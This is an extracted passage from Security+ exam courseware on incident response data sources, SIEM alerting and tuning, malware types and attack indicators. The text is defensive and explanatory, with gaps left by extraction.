An endpoint log is likely to refer to events monitored by security software running
on the host, rather than by the OS itself. This can include host-based firewalls and
intrusion detection, vulnerability scanners, and antivirus/antimalware protection
suites. Suites that integrate these functions into a single product are often referred
to as an endpoint protection platform (EPP), enhanced detection and response
(EDR), or extended detection and response (XDR). These security tools can be
directly integrated with a SIEM using agent-based software.
Summarizing events from endpoint protection logs can show overall threat levels,
such as amount of malware detected, number of host intrusion detection events,
and numbers of hosts with missing patches. Close analysis of detection events can
assist with attributing intrusion events to a specific actor, and developing threat
intelligence of tactics, techniques, and procedures.
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12C
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Vulnerability Scans
While there is usually a summary report, a vulnerability scanner can be configured
to log each vulnerability detected to a SIEM. Vulnerabilities can include missing
patches and noncompliance with a baseline security configuration. The SIEM will be
able to retrieve a list of these logs for each host. Depending on the date of the last
scan, it may be difficult to identify from the log data which have been remediated,
but in general terms this will provide useful information about whether a host is
properly configured.
Network Logs
Network logs are generated by appliances such as routers, firewalls, switches, and
access points. Log files will record the operation and status of the appliance itself—
the system log for the appliance—plus traffic and access logs recording network
behavior. For example, network applicance access logs might reveal the following
types of threat:
• A switch log might reveal an endpoint trying to use multiple MAC addresses to
perpetrate an on-path attack.
• An access point log could record disassocation events that indicate a threat actor
trying to attack the wireless network.
Excerpts from a typical SOHO router log as it restarts. The events show the router re-establishing
an Internet/WAN connection, updating the system date and time using Network Time Protocol
(NTP), running a firmware update check, and connecting a wireless client. The client is not initially
authenticated, probably as the user was entering the wrong passphrase.
Firewall Logs
Any firewall rule can be configured to generate an event whenever it is triggered.
As with most types of security data, this can quickly generate on overwhelming
number of events. It is also possible to configure log-only rules. Typically, firewall
logging will be used when testing a new rule or only enabled for high-impact rules.
A firewall audit event will record a date/timestamp, the interface on which the
rule was triggered, whether the rule matched incoming/ingress or outgoing/
egress traffic, and whether the packet was accepted or dropped. The event data
will also record packet information, such as source and destination address and
port numbers. This information can support investigation of host compromise.
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12C
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
For example, say that a host-based IDS reports that a malicious process on a local
server is attempting to connect to a particular port on an Internet host. The firewall
log could confirm whether the connection was allowed or denied, and identify
which rule potentially needs adjusting.
Firewall log showing what pass and block rules have been triggered, with source and destination
ports and IP addresses
As the log action is configured per-rule, it is possible that a single packet will trigger
multiple events.
IPS/IDS Logs
An IPS/IDS log is an event when a traffic pattern is matched to a rule. As this can
generate a very high volume of events, it might be appropriate to only log high
sensitivity/impact rules. As with firewall logging, a single packet might trigger
multiple rules.
An intrusion prevention system could additionally be configured to log shuns,
resets, and redirects in the same way as a firewall.
As with endpoint protection logs, summary event data from IDS/IPS can be
visualized in dashboard graphs to represent overall threat levels. Close analysis of
detection events can assist with attributing intrusion events to a specific actor, and
developing threat intelligence of TTPs.
Viewing the raw log message generated by a Suricata IDS alert in the Security Onion SIEM.
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12C
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Packet Captures
Network traffic can provide valuable insights into potential breaches. Network
traffic is typically analyzed in detail at the level of individual frames or using
summary statistics of traffic flows and protocol usage.
A SIEM will store selected information from sensors installed to different points
on the network. Information captured from network packets can be aggregated
and summarized to show overall protocol usage and endpoint activity. On a
typical network, sensors are not configured to record all network traffic, as this
would generate a very considerable amount of data. More typically, only packets
that triggered a given firewall or IDS rule are recorded. SIEM software will usually
provide the ability to pivot from an event or alert summary to opening the
underlying packets in an analyzer.
On the other hand, given sufficient resources, a retrospective network analysis (RNA)
solution provides the means to record the totality of network events at either a packet
header or payload level.
Using the Wireshark packet analyzer to identify malicious executables being transferred
over the Windows file-sharing protocol. (Screenshot Wireshark wireshark.org.)
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12C
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Metadata
Metadata is the properties of data as it is created by an application, stored on
media, or transmitted over a network. Each logged event has metadata, but a
number of other metadata sources are likely to be useful when investigating
incidents. Metadata can establish timeline questions, such as when and where a
breach occurred, as well as containing other types of evidence.
File
File metadata is stored as attributes. The file system tracks when a file was created,
accessed, and modified. A file might be assigned a security attribute, such as
marking it as read-only or as a hidden or system file. The ACL attached to a file
showing its permissions represents another type of attribute. Finally, the file may
have extended attributes recording an author, copyright information, or tags for
indexing/searching.
As metadata is uploaded to social media sites, they can reveal more information than
the uploader intended. Metadata can include current location and time which is added
to media such as photos and videos.
Web
When a client requests a resource from a web server, the server returns the
resource plus headers setting or describing its properties. Also, the client can
include headers in its request. One key use of headers is to transmit authorization
information, in the form of cookies. Headers describing the type of data returned
(text or binary, for instance) can also be of interest. The contents of headers can
be inspected using the standard tools built into web browsers. Header information
may also be logged by a web server.
Email
An email’s Internet header contains address information for the recipient and
sender, plus details of the servers handling transmission of the message between
them. When an email is created, the mail user agent (MUA) creates an initial header
and forwards the message to a mail delivery agent (MDA). The MDA should perform
checks that the sender is authorized to issue messages from the domain. Assuming
the email isn’t being delivered locally at the same domain, the MDA adds or amends
its own header and then transmits the message to a message transfer agent (MTA).
The MTA routes the message to the recipient, with the message passing via one
or more additional MTAs, such as SMTP servers operated by ISPs or mail security
gateways. Each MTA adds information to the header.
Headers aren’t exposed to the user by most email applications. You can view and
copy headers from a mail client via a message properties/options/source command.
MTAs can add a lot of information in each received header, such as the results of
spam checking. If you use a plaintext editor to view the header, it can be difficult
to identify where each part begins and ends. Fortunately, there are plenty of tools
available to parse headers and display them in a more structured format. One
example is the Message Analyzer tool, available as part of the Microsoft Remote
Connectivity Analyzer (testconnectivity.microsoft.com/tests/o365). This will lay out
the hops that the message took more clearly and break out the headers added by
each MTA.
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12C
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12C
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Data Sources
6
3. True or false? It is not possible to set custom file system audit settings
when using security log data.
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12C
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 12D
Alerting and Monitoring Tools
5
There are many types of security controls that can be deployed to protect networks,
hosts, and data. One thing that all these controls have in common is that they
generate log data and alerts. Collecting and reviewing this output is one of the
principal cybersecurity challenges. As a security professional, you must be able to
explain the configuration and use of systems to manage data sources and provision
an effective monitoring and alerting system.
Wazuh SIEM dashboard—Configurable dashboards provide the high-level status view of network
security metrics. (Screenshot used with permission from Wazuh Inc.)
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12D
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Sensor—as well as log data, the SIEM might collect packet captures and traffic
flow data from sniffers. A sniffer can record network data using either the mirror
port functionality of a switch or using some type of tap on the network media.
Agent configuration file for event sources to report to the Wazuh SIEM.
Log Aggregation
As distinct from collection, log aggregation refers to normalizing data from
different sources so that it is consistent and searchable. SIEM software features
connectors or plug-ins to interpret (or parse) data from distinct types of systems
and to account for differences between vendor implementations. Each agent,
collector, or sensor data source will require its own parser to identify attributes and
content that can be mapped to standard fields in the SIEM’s reporting and analysis
tools. Another important function is to normalize date/time zone differences to a
single timeline.
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12D
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Note that these activities can be performed manually or automated using discrete tools
for each security appliance. The advantage of a SIEM is to consolidate the activities to
a single management interface. This consolidated functionality referred to as a "single
pane of glass" refers to the enhanced visibility into a complex environment that such
software offers.
Alerting
A SIEM can then run correlation rules on indicators extracted from the data sources
to detect events that should be investigated as potential incidents. An analyst can
also filter or query the data based on the type of incident that has been reported.
Correlation means interpreting the relationship between individual data points to
diagnose incidents of significance to the security team. A SIEM correlation rule is
a statement that matches certain conditions. These rules use logical expressions,
such as AND and OR, and operators, such as == (matches), < (less than), >
(greater than), and in (contains). For example, a single-user login failure is not
a condition that should raise an alert. Multiple user login failures for the same
account, taking place within the space of one hour, is more likely to require
investigation and is a candidate for detection by a correlation rule.
Error.LoginFailure > 3 AND LoginFailure.User AND
Duration < 1 hour
As well as correlation between indicators observed in the collected data, a SIEM is
likely to be configured with a threat intelligence feed. This means that data points
observed in the collected network data can be associated with known threat actor
indicators, such as IP addresses and domain names.
Each alert will be dealt with by the incident response processes of analysis,
containment, eradication, and recovery. When used in conjunction with a SIEM, two
particular steps in alert response and remediation deserve particular attention:
• Validation during the analysis process is how the analyst decides whether the
alert is a true positive and needs to be treated as an incident. A false positive is
where an alert is generated, but there is no actual threat activity.
Alert response and remediation steps will often be guided by a playbook that assists
the analyst with applying all incident response processes for a given scenario. One
of the advantages of SIEM and advanced security orchestration, authorization
and reporting (SOAR) solutions is to fully or partitally automate validation and
remediation. For example, a quarantine action could be available as a mouse-click
action via an integration with a firewall or endpoint protection product. Validation
is made easier by being able to correlate event data to known threat data and pivot
between sources, such as inspecting the packets that triggered a particular IDS alert.
Reporting
Reporting is a managerial control that provides insight into the status of the security
system. A SIEM can assist with reporting activity by exporting summary statistics
and graphs. Report formats and contents are usually tailored to meet the needs of
different audiences:
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12D
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Determining which metrics are most useful in terms of reporting is always very
challenging. The following types illustrate some common use cases for reporting:
• Authentication data, such as failed login attempts, and critical file audit data.
• Incident case management statistics, such as overall volume, open cases, time to
resolve, and so on.
Archiving
A SIEM can enact a retention policy so that historical log and network traffic data is
kept for a defined period. This allows for retrospective incident and threat hunting,
and can be a valuable source of forensic evidence. It can also meet compliance
requirements to hold archives of security information. SIEM performance will
degrade if an excessive amount of data is kept available for live analysis. A log
rotation scheme can be configured to move outdated information to archive storage.
Alert Tuning
Correlation rules are likely to assign a criticality level to each match. Examples
include the following:
• Log only—an event is produced and added to the SIEM’s database, but it is
automatically classified.
Alert tuning is necessary to reduce the incidence of false positives. False positive
alerts and alarms waste analysts’ time and reduce productivity. Alert fatigue refers
to the sort of situation where analysts are so consumed with dismissing numerous
low-priority alerts that they miss a single high-impact alert that could have
prevented a data breach. Analysts can become more preoccupied with looking for
a quick reason to dismiss an alert than with properly evaluating the alert. Reducing
false positives is difficult, however, firstly because there isn’t a simple dial to turn for
overall sensitivity, and secondly because reducing the number of rules that produce
alerts increases the risk of false negatives.
A false negative is where the system fails to generate an alert about malicious
indicators that are present in the data source. False negatives are a serious
weakness in the security system. One of the purposes of threat hunting activity is
to identify whether the monitoring system is subject to false negatives.
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12D
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
There is also a concept of true negatives. This is a measure of events that the system
has properly allowed. Metrics for false and true negatives can be used to assess the
performance of the alerting system.
Some of the techniques used to manage alert tuning include the following:
• Refining detection rules and muting alert levels—If a certain rule is generating
multiple dashboard notifications, the parameters of the rule can be adjusted to
reduce this, perhaps by adding more correlation factors. Alternatively, the alert
can be muted to log-only status, or configured so that it only produces a single
notification for every 10 or 100 events.
Monitoring Infrastructure
Managerial reports can be used for day-to-day monitoring of computer resources
and network infrastructure. Not all issues can be identified from alerts and
alarms. Running a custom report allows a manager to verify results of logging and
monitoring activity to ensure that the network remains in a secure state.
Network Monitors
As distinct from network traffic monitoring, a network monitor collects data
about network infrastructure appliances, such as switches, access points, routers,
firewalls. This is used to monitor load status for CPU/memory, state tables, disk
capacity, fan speeds/temperature, network link utilization/error statistics, and so
on. Another important function is a heartbeat message to indicate availability.
This data might be collected using the Simple Network Management Protocol
(SNMP). An SNMP trap informs the management system of a notable event, such
as port failure, chassis overheating, power failure, or excessive CPU utilization. The
threshold for triggering traps can be set for each value. This provides a mechansim
for alerts and alarms for hardware issues.
As well as supporting availability, network monitoring might reveal unusual
conditions that could point to some kind of attack.
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12D
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
NetFlow
A flow collector is a means of recording metadata and statistics about network
traffic rather than recording each frame. Network traffic and flow data may come
from a wide variety of sources (or probes), such as switches, routers, firewalls, and
web proxies. Flow analysis tools can provide features such as the following:
• Highlighting of trends and patterns in traffic generated by particular applications,
hosts, and ports.
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12D
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Logs typically associate an action with a particular user. This is one of the reasons why it
is critical that users not share login details. If a user account is compromised, there is no
means of tying events in the log to the actual attacker.
Vulnerability Scanners
A vulnerability scanner will report the total number of unmitigated vulnerabilities
for each host. Consolidating these results can show the status of hosts across the
whole network and highlight issues with a particular patch or configuration issue.
Antivirus
Most hosts should be running some type of antivirus scan (A-V) software. While
the A-V moniker remains popular, these suites are better conceived of as endpoint
protection platforms (EPPs) or next-gen A-V. These detect malware by signature
regardless of type, though detection rates can vary quite widely from product to
product. Many suites also integrate with user and entity behavior analytics (UEBA)
and use AI-backed analysis to detect threat actor behavior that has bypassed
malware signature matching.
Antivirus will usually be configured to block a detected threat automatically. The
software can be configured to generate a dashboard alert or log via integration with
a SIEM.
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12D
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Benchmarks
One of the functions of a vulnerability scan is to assess the configuration of security
controls and application settings and permissions compared to established
benchmarks.
The scanner might try to identify whether there is a lack of controls that might be
considered necessary or whether there is any misconfiguration of the system that
would make the controls less effective or ineffective, such as antivirus software
not being updated, or management passwords left configured to the default. This
sort of testing requires specific information about best practices in configuring
the particular application or security control. These best practices are provided by
listing the controls and appropriate configuration settings in a template.
Security Content Automation Protocol (SCAP) allows compatible scanners to
determine whether a computer meets a configuration baseline. SCAP uses several
components to accomplish this function, but some of the most important are the
following:
• Open Vulnerability and Assessment Language (OVAL)—an XML schema
for describing system security state and querying vulnerability reports and
information.
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12D
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Some scanners measure systems and configuration settings against best practice
frameworks. This is referred to as a compliance scan. This might be necessary
for regulatory compliance, or you might voluntarily want to conform to externally
agreed upon standards of best practice.
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12D
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Alerting and Monitoring Tools
6
3. Your company has implemented a SIEM but found that there is no parser
for logs generated by the network’s UTM gateway. Why is a parser
necessary?
4. Your manager has asked you to prepare a summary of the activities that
support alerting and monitoring. You have sections for log aggregation,
alerting, scanning, reporting, and alert response and remediation/
validation (including quarantine and alert tuning). Following the
CompTIA Security+ exam objectives, which additional activity should you
cover?
Lesson 12: Explain Incident Response and Monitoring Concepts | Topic 12D
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Lesson 12
Summary
6
You should be able to explain the process and procedures involved in effective
incident response and digital forensics, including the data sources and event
management tools necessary for investigations, alerting, and monitoring.
• Develop an incident classification system and prepare IRPs and playbooks for
distinct incident scenarios.
• Host log file data sources (network, system, security, vulnerability scan
output).
• Consider the order of volatility and potential loss of evidence if a host is shut
down or powered off.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Deploy forensic tools that can capture and validate evidence from persistent
and nonpersistent media.
• Log events and metadata from firewalls, applications, endpoint antivirus and
DLP, OS-specific security events, IDS/IPS, network appliances, SNMP, and
vulnerability scans.
• Consider deploying SIEM to aggregate and correlate data sources to drive event
alerting and monitoring dashboards and automated reports. Use alert tuning to
reduce false positives, without increasing false negatives.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Activity
LESSON INTRODUCTION
The preparation phase of incident response identifies data sources that can support
investigations. It also provisions tools to aggregate and correlate this data and
partially automate its analysis to drive an alerting and monitoring system. While
automated detection is a huge support for the security team, it cannot identify
all indicators of malicious activity. As an incident responder, you must be able to
identify signs in data sources that point to a particular type of attack.
Lesson Objectives
In this lesson, you will do the following:
• Analyze indicators of malicious activity in malware, physical, network, and
application attacks.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 13A
Malware Attack Indicators
2
By classifying the various types of malware and identifying the signs of infection,
security teams are better prepared to remediate compromised systems or prevent
malware from executing in the first place.
Malware Classification
Many of the intrusion attempts perpetrated against computer networks depend on
the use of malicious software, or malware. Malware is simply defined as software
that does something bad, from the perspective of the system owner. A complicating
factor with malware classification is the degree to which its installation is expected
or tolerated by the user.
Some malware classifications, such as Trojan, virus, and worm, focus on the vector
used by the malware. The vector is the method by which the malware executes on a
computer and potentially spreads to other network hosts. The following categories
describe some types of malware according to vector:
• Viruses and worms represent some of the first types of malware and spread
without any authorization from the user by being concealed within the
executable code of another process. These processes are described as being
infected with malware.
• Trojan refers to malware concealed within an installer package for software that
appears to be legitimate. This type of malware does not seek any type of consent
for installation and is actively designed to operate secretly.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Other classifications are based on the payload delivered by the malware. The
payload is an action performed by the malware other than simply replicating or
persisting on a host. Examples of payload classifications include spyware, rootkit,
remote access Trojan (RAT), and ransomware.
Computer Viruses
A computer virus is a type of malware designed to replicate and spread from
computer to computer, usually by “infecting” executable applications or program
code. There are several different types of viruses, and they are generally classified
by the different types of file or media that they infect:
• Non-resident/file infector—the virus is contained within a host executable file
and runs with the host process. The virus will try to infect other process images
on persistent storage and perform other payload actions. It then passes control
back to the host program.
• Memory resident—when the host file is executed, the virus creates a new
process for itself in memory. The malicious process remains in memory, even if
the host process is terminated.
• Boot—the virus code is written to the disk boot sector or the partition table of a
fixed disk or USB media and executes as a memory-resident process when the
OS starts or the media is attached to the computer.
In addition, the term “multipartite” is used for viruses that use multiple vectors and
the term “polymorphic” is used for viruses that can dynamically change or obfuscate
their code to evade detection.
What these types of viruses have in common is that they must infect a host file or media.
An infected file can be distributed through any normal means—on a disk, on a network,
as an attachment to an email or social media post, or as a download from a website.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Fileless malware may use “live off the land” techniques rather than compiled
executables to evade detection. This means that the malware code uses
legitimate system scripting tools, notably PowerShell and Windows Management
Instrumentation (WMI), to execute payload actions. If they can be executed with
sufficient permissions, these environments provide all the tools the attacker
needs to perform scanning, reconfigure settings, and exfiltrate data.
The terms “advanced persistent threat (APT)” and “advanced volatile threat
(AVT)” can be used to describe this general class of modern fileless/live off the land
malware. Another useful classification is low-observable characteristics (LOC) attack.
The exact classification is less important than the realization that adversaries can
use any variety of coding tricks to effect intrusions and that their tactics, techniques,
and procedures to evade detection are continually evolving.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Supercookies and beacons—as browser software gives the user some control
over what cookies to accept, web marketing companies have come up with
alternative ways to implement tracking that are difficult to disable. A supercookie
is a means of storing tracking data in a non-regular way, such as saving it to
cache without declaring the data to be a cookie or encoding data into header
requests. A beacon is a single pixel image embedded into a website. While
invisible to the user, the browser must make a request to download the pixel
to load the site, giving the beacon host the opportunity to collect metadata,
perform browser fingerprinting, and potentially run tracking scripts.
Using the Metasploit Meterpreter remote access tool to dump keystrokes from the victim machine,
revealing the password used to access a web app.
Keyloggers are not only implemented as software. A malicious script can transmit key
presses to a third-party website. There are also hardware devices to capture key presses
to a modified USB adapter inserted between the keyboard and the port. Such devices
can store data locally or come with Wi-Fi connectivity to send data to a covert access
point. Other attacks include wireless sniffers to record key press data, overlay ATM pin
pads, and so on.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
In this context, RAT can also stand for remote administration tool. A host that is under
malicious control is sometimes described as a zombie.
A compromised host can be installed with one or more bots. A bot is an automated
script or tool that performs some malicious activity. A group of bots that are all
under the control of the same malware instance can be manipulated as a botnet
by the herder program. A botnet can be used for many types of malicious purpose,
including triggering distributed denial of service (DDoS) attacks, launching spam
campaigns, or performing cryptomining.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Rootkits
In Windows, Trojan malware that depends on manual execution by the logged-on
user inherits the privileges of that user account. If the account has only standard
permissions, the malware will only be able to add, change, or delete files in the
user’s profile and to run only apps and commands that the user is permitted to.
If the malware attempts to change system-wide files or settings, it requires local
administrator-level privileges. To obtain those through manual installation or
execution, the user must be confident enough in the Trojan package to confirm the
User Account Control (UAC) prompt or enter the credentials for an administrative
user.
If the malware gains local administrator-level privileges, there are still protections
in Windows to mitigate abuse of these permissions. Critical processes run with
a higher level of privilege called SYSTEM. Consequently, Trojans installed or
executed with local administrator privileges cannot conceal their presence entirely
and will show up as a running process or service. Often the process image name
is configured to resemble a genuine executable or library to avoid detection.
For example, a Trojan may use the filename “rund1132.exe” to masquerade as
“rundll32.exe.” To ensure persistence (running when the computer is restarted),
the Trojan may have to use a registry entry or create itself as a service, which can
usually be detected easily.
If the malware can be delivered as the payload for an exploit of a severe
vulnerability, it may be able to execute without requiring any authorization using
SYSTEM privileges. Alternatively, the malware may be able to use an exploit to
escalate privileges to SYSTEM level after installation. Malware running with this level
of privilege is referred to as a rootkit. The term derives from UNIX/Linux where
any process running as the root superuser account has unrestricted access to
everything from the root of the file system down.
In theory, there is nothing about the system that a rootkit could not change. In
practice, Windows uses other mechanisms to prevent misuse of kernel processes,
such as code signing. Consequently, what a rootkit can do depends largely on
adversary capability and level of effort. When dealing with a rootkit, you should
be aware that there is the possibility that it can compromise system files and
programming interfaces, so that local shell processes, such as Explorer, taskmgr, or
tasklist on Windows or ps or top on Linux, plus port scanning tools, such as netstat,
no longer reveal its presence (at least, if run from the infected machine). A rootkit
may also contain tools for cleaning system logs, further concealing its presence.
Software processes can run in one of several "rings." Ring 0 is the most privileged (it
provides direct access to hardware) and so should be reserved for kernel processes only.
Ring 3 is where user-mode processes run; drivers and I/O processes may run in Ring 1 or
Ring 2. This architecture can also be complicated by the use of virtualization.
There are also examples of rootkits that can reside in firmware (either the computer
firmware or the firmware of any sort of adapter card, hard drive, removable
drive, or peripheral device). These can survive any attempt to remove the rootkit
by formatting the drive and reinstalling the OS. For example, the US intelligence
agencies have developed DarkMatter and Quark Matter UEFI rootkits targeting the
firmware on Apple Macbook laptops.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Scareware refers to malware that displays alarming messages, often disguised to look
like genuine OS alert boxes. Scareware attempts to alarm the user by suggesting that
the computer is infected or has been hijacked.
Crypto-Ransomware
The crypto class of ransomware attempts to encrypt data files on any fixed,
removable, and network drives. If the attack is successful, the user will be unable to
access the files without obtaining the private encryption key, which is held by the
attacker. If successful, this sort of attack is extremely difficult to mitigate, unless
the user has backups of the encrypted files. One example of crypto-ransomware
is CryptoLocker, a Trojan that searches for files to encrypt and then prompts the
victim to pay a sum of money before a certain countdown time, after which the
malware destroys the key that allows the decryption.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Cryptojacking Malware
Another type of crypto-malware hijacks the resources of the host to perform
cryptocurrency mining. This is referred to as crypto-mining, and malware that
performs crypto-mining maliciously is classed as cryptojacking. The total number
of coins within a cryptocurrency is limited by the difficulty of performing the
calculations necessary to mint a new digital coin. Consequently, new coins can
be very valuable, but it takes enormous computing resources to discover them.
Cryptojacking is often performed across botnets.
Logic Bombs
Some types of malware do not trigger automatically. Having infected a system,
they wait for a preconfigured time or date (time bomb) or a system or user event
(logic bomb). Logic bombs also need not be malware code. A typical example is a
disgruntled systems administrator who leaves a scripted trap that runs in the event
their account is deleted or disabled. Antivirus software is unlikely to detect this kind
of malicious script or program. This type of trap is also referred to as a mine.
As an example of TTP analysis, consider the scenario where a criminal gang seeks to
blackmail companies by infecting hosts with ransomware. This is the threat actor’s
goal. To achieve the goal, they deploy a campaign, comprising a number of tactics,
such as reconnaissance, resource development, initial access, and execution.
Within the initial access tactic, the gang might have developed a novel technique to
exploit a vulnerability in some network monitoring software used by a wide range
of companies. Analysis of procedures reveals exactly how the exploited software
is installed on company networks through an infected repository. This enables the
gang’s next tactic (execution of malware).
An indicator of compromise (IoC) is a residual sign that an asset or network has
been successfully attacked or is continuing to be attacked. Put another way, an IoC
is evidence of a TTP. In the scenario above, IoCs could include the presence of the
compromised network monitor process version, connections to the C&C network,
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Strictly speaking, an IoC is evidence of an attack that was successful. The term "indicator
of attack (IoA)" is sometimes also used for evidence of an intrusion attempt in progress.
Sandbox Execution
If malicious activity is not detected by endpoint protection, analyze the suspect
code or host in a sandboxed environment. A sandbox is a system configured to
be completely isolated from the production network so that the malware cannot
“break out.” The sandbox will be designed to record file system and registry
changes plus network activity. Similarly, a sheep dip is an isolated host used to test
new software and removable media for malware indicators before it is authorized
on the production network.
Resource Consumption
Abnormal resource consumption can be detected using a performance monitor.
Indicators such as excessive and continuous CPU usage, memory leaks, disk read/
write activity, disk space usage, and network bandwidth consumption can be signs
of malware. Resource consumption could be a reason to investigate a system rather
than definitive proof of malicious activity. These symptoms can also be caused by
many other performance and system stability issues. Also, it is only poorly written
malware or malware that performs intensive operations that displays this behavior.
For example, it is the nature of botnet DDoS, cryptojacking, and crypto-ransomware
to hijack the computer’s resources.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Windows Performance Monitor recording CPU utilization on a client PC. Anomalous activity
is difficult to diagnose, but this graph shows load rarely dropping below 50%. Continual load
is not typical of a client system, and could be an indicator of cryptojacking malware.
(Screenshot used with permission from Microsoft.)
File System
Malicious code might not execute from a process image saved on a local disk, but
it is still likely to interact with the file system and registry, revealing its presence by
behavior. A computer’s file system stores a great deal of useful metadata about
when files were created, accessed, or modified. Analyzing these metadata and
checking for suspicious temporary files can help to establish a timeline of events for
an incident that has left traces on a host and its files.
Attempts to access valuable data can be revealed by blocked content indicators.
Where files are simply protected by ACLs, if auditing is configured, an access denied
message will be logged if a user account attempts to read or modify a file it does
not have permission to access. Information might also be protected by a data loss
prevention (DLP) system, which will also log blocked content events.
Resource Inaccessibility
Resource inaccessibility means that a network, host, file, or database is not
available. This is typically an indicator of a denial of service (DoS) attack. Host and
network gateways might be unavailable due to excessive resource consumption.
A network attack will often create large numbers of connections. Data resources
might be subject to ransomware attack. Additionally, malware might disable
scanning and monitoring utilities to evade detection.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Account Compromise
A threat actor will often try to exploit an existing account to achieve objectives. The
following indicators can reveal suspicious account behavior:
• Account lockout—the system has prevented access to the account because
too many failed authentication attempts have been made. Lockout could also
mean that the user’s password no longer works because the threat actor has
changed it.
• Concurrent session usage—this indicates that the threat actor has obtained
the account credentials and is signed in on another workstation or over a remote
access connection.
Logging
A threat actor will often try to cover their tracks by removing indicators from log
files:
• Missing logs—this could mean that the log file has been deleted. As this is easy
to detect, a more sophisticated threat actor will remove log entries. This might
be indicated by unusual gaps between log entry times. The most sophisticated
type of attack will spoof log entries to conceal the malicious activity.
• Out-of-cycle logging—a threat actor might also manipulate the system time or
change log entry timestamps as a means of hiding activity.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Malware Attack Indicators
3
travel services firm. The CEO is confused because they had heard that
Trojans represent the biggest threat to computer security these days.
What explanation can you give?
3. You are writing a security awareness blog for company CEOs subscribed
3.
to your threat platform. Why are backdoors and Trojans different ways
of classifying and identifying malware risks?
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 13B
Physical and Network Attack Indicators
7
Company sites and offices and their networks present a wide attack surface
for threat actors to target. Understanding how denial of service, on-path, and
credential-based attacks are perpetrated and being able to diagnose their
indicators from appropriate data sources will help you to prevent and remediate
intrusion events.
Physical Attacks
A physical attack is one directed against cabling infrastructure, hardware devices,
or the environment of the site facilities hosting the network.
Brute Force
A brute force physical attack can take several different forms, some examples of
which are the following:
• Smashing a hardware device to perform physical denial of service (DoS).
Environmental
An environmental attack could be an attempt to perform denial of service. For
example, a threat actor could try to destroy power lines, cut through network
cables, or disrupt cooling systems. Alternatively, environmental and building
maintenance systems are known vectors for threat actors to try to gain access to
company networks.
The risk from physical attacks means that premises must be monitored for signs of
physical damage or the addition of rogue devices.
RFID Cloning
Radio Frequency ID (RFID) is a means of encoding information into passive tags.
When a reader is within range of the tag, it produces an electromagnetic wave
that powers up the tag and allows the reader to collect information from it. This
technology can be used to implement contactless building access control systems.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
These attacks can generally only target “dumb” access cards that transfer static
tokens rather than perform cryptoprocessing. If use of the cards is logged,
compromise might be indicated by impossible travel and concurrent use access
patterns.
Near-field communication (NFC) is derived from RFID and is also often used for
contactless cards. It works only at very close range and allows two-way communications
between NFC peers.
Network Attacks
A network attack is a general category for a number of strategies and techniques
that threat actors use to either disrupt or gain access to systems via a network
vector. Network attack analysis is usually informed by considering the place each
attack type might have within an overall cyberattack lifecycle:
• Reconnaissance is where a threat actor uses scanning tools to learn about
